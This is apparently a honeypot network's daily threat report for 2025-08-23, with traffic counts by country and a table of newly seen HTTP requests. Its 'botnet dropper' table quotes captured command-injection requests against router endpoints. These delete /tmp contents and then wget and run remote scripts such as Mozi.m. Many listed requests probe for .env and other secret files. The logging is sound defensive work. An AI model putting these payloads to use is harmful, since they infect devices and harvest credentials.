Daily Report: 2025-08-23#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).
There are 45 new requests that have never been observed before (these were added to the monitored request database.).
A total of 836 requests were recorded during the day, originating from 5 different countries, with a peak of 418 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
GB | Germany |
US | Dubai |
GB | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
156.192.180.249 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1 |
45.156.87.165 | GET /proxy.cgi?chk&url=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.hsg.sh%7Csh%3B HTTP/1.1 |
45.156.87.165 | GET /goform/SystemCommand?command=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.qyz.sh%7Csh HTTP/1.1 |
120.86.255.9 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
122.97.209.152 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.33.10.58:51278/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
18 | 3 | POST /goform/SystemCommand HTTP/1.1 |
165 | 2 | GET /poc/system/serviceInfo.json?v=1 HTTP/1.1 |
168 | 2 | CONNECT 196.251.66.3:80 HTTP/1.0 |
174 | 2 | \x04\x01\x00P\xC4\xFBB\x03\x00 |
216 | 1 | GET /config/.env.staging HTTP/1.1 |
217 | 1 | GET /config/.env.testing HTTP/1.1 |
218 | 1 | GET /config/.env.example HTTP/1.1 |
221 | 1 | GET /config/.env.template HTTP/1.1 |
222 | 1 | GET /config/.env.sample HTTP/1.1 |
223 | 1 | GET /config/.env.tmp HTTP/1.1 |
226 | 1 | GET /src/config/.env HTTP/1.1 |
227 | 1 | GET /src/env/.env HTTP/1.1 |
234 | 1 | GET /temp/env/.env HTTP/1.1 |
245 | 1 | GET /laravel/.env.example HTTP/1.1 |
246 | 1 | GET /laravel/config/.env HTTP/1.1 |
247 | 1 | GET /laravel/storage/.env HTTP/1.1 |
249 | 1 | GET /django/settings/.env HTTP/1.1 |
250 | 1 | GET /django/config/.env HTTP/1.1 |
253 | 1 | GET /rails/config/.env HTTP/1.1 |
254 | 1 | GET /php/.env HTTP/1.1 |
255 | 1 | GET /www/config/.env HTTP/1.1 |
259 | 1 | GET /k8s/secrets.env HTTP/1.1 |
265 | 1 | GET /.env.pipeline HTTP/1.1 |
268 | 1 | GET /github/workflows/.env HTTP/1.1 |
269 | 1 | GET /gitlab-ci/.env HTTP/1.1 |
272 | 1 | GET /etc/environment HTTP/1.1 |
273 | 1 | GET /etc/secrets/.env HTTP/1.1 |
274 | 1 | GET /usr/local/etc/.env HTTP/1.1 |
275 | 1 | GET /usr/local/etc/config/.env HTTP/1.1 |
280 | 1 | GET /config/secrets/.env HTTP/1.1 |
289 | 1 | GET /.env-vars HTTP/1.1 |
290 | 1 | GET /.app-env HTTP/1.1 |
293 | 1 | GET /.dev-env HTTP/1.1 |
294 | 1 | GET /myplms/public HTTP/1.1 |
295 | 1 | GET /api/myplms/public HTTP/1.1 |
296 | 1 | GET /api/myplms/auth/login HTTP/1.1 |
297 | 1 | GET /api/myplms/users HTTP/1.1 |
298 | 1 | GET /api/myplms/courses HTTP/1.1 |
299 | 1 | GET /api/myplms/settings/info.php HTTP/1.1 |
300 | 1 | GET /phpunit.xml HTTP/1.1 |
301 | 1 | GET /supervisor-example.conf HTTP/1.1 |
312 | 1 | GET /.env.lock HTTP/1.1 |
374 | 1 | GET /.blog HTTP/1.1 |
381 | 1 | GET http://www.serv00.com HTTP/1.1 |
382 | 1 | HEAD http://www.serv00.com HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 418 | GB |
1 | 158 | NL |
2 | 79 | BG |
3 | 62 | US |
4 | 31 | ZA |
5 | 14 | SC |
6 | 14 | DE |
7 | 9 | KR |
8 | 6 | UA |
9 | 6 | RU |
10 | 6 | JP |
11 | 6 | SG |
12 | 6 | TR |
13 | 5 | LT |
14 | 4 | IR |
15 | 2 | CN |
16 | 2 | PT |
17 | 2 | HK |
18 | 1 | ES |
19 | 1 | BR |
20 | 1 | EG |
21 | 1 | BE |
22 | 1 | FR |
23 | 1 | SE |